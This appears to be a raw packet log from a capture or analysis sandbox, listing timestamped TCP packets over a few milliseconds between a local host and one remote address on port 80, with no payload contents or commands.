Nov 7, 2024 04:12:27.856359959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856373072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856379032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856379032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856384039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856389999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856405973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856416941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856425047 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856429100 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856441021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856457949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856477976 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856489897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856499910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856520891 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856553078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856596947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856618881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856630087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856642962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856653929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856656075 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856673002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856681108 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856686115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856694937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856702089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856704950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856714010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856725931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856738091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856743097 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856750011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856777906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856798887 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856868982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856880903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856892109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856904984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856914997 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856918097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856925011 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856945038 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856955051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.856964111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.856986046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857012033 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857034922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857045889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857058048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857068062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857070923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857079983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857095003 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857125044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857127905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857137918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857150078 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857161045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857166052 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857172012 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857191086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857199907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857212067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857220888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857233047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857235909 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857244015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857254982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857271910 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857276917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857289076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857295990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857300043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857311010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857316971 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857325077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857336998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857351065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857386112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857387066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857398987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857409954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857426882 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857445002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857455969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857456923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857469082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857479095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857481956 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857508898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857513905 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857521057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857532978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857534885 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857572079 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857573986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857589960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857604027 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857614040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857625008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857626915 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857650042 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857657909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857667923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857671976 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857688904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857697964 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857702017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857712984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857719898 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857726097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857728958 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857738018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857753038 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857760906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857780933 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857784986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857801914 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857825041 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857836008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857847929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857858896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857878923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857892990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857903957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857909918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857916117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857925892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857934952 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857966900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.857976913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.857989073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858000994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858012915 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858023882 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.858052969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.858087063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858108044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858118057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858134031 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.858160019 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.858160973 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858217001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858228922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858241081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858253002 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858262062 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.858264923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858278990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.858304977 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.858333111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.858387947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858397961 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858433008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.858439922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858481884 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.858490944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858501911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858514071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.858531952 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.858551979 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859005928 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859049082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859056950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859066963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859086990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859101057 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859106064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859111071 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859117985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859132051 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859154940 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859390974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859401941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859414101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859425068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859441042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859445095 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859451056 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859458923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859478951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859508038 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859541893 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859555006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859570026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859580040 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859582901 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859594107 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859596014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859616041 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859638929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859846115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859865904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859875917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859885931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859894991 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859895945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859906912 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859916925 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859919071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.859925032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859942913 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.859962940 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860064030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860076904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860088110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860104084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860109091 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860115051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860130072 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860157967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860193014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860238075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860249043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860270977 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860290051 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860513926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860523939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860559940 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860589981 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860603094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860615015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860625982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860631943 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860660076 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860857964 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860881090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860889912 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860898972 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860910892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860922098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860922098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860930920 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860948086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860963106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.860965014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.860972881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861008883 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861041069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861076117 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861099958 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861109972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861129045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861140966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861140966 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861145973 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861150980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861161947 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861182928 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861227036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861237049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861247063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861257076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861267090 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861282110 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861310959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861649036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861660004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861677885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861690998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861694098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861701965 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861713886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861715078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861737013 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861763954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861865044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861934900 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861944914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861954927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861968040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861975908 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.861979008 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.861996889 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862020969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862026930 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862031937 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862045050 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862054110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862062931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862076998 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862083912 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862102032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862119913 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862128019 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862138987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862176895 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862191916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862201929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862231016 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862253904 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862257957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862267971 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862288952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862299919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862303019 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862310886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862325907 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862351894 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862773895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862786055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862799883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862809896 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862814903 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862822056 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862833023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862839937 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862864971 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862869978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862880945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862886906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862910032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862916946 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862921953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862932920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862941980 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862972021 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.862978935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.862998009 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863009930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863015890 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863020897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863032103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863032103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863053083 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863075018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863080978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863085985 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863099098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863110065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863114119 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863122940 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863162041 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863162041 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:27.863189936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863200903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863213062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:27.863226891 CET	49762	80	192.168.2.4	185.215.113.16
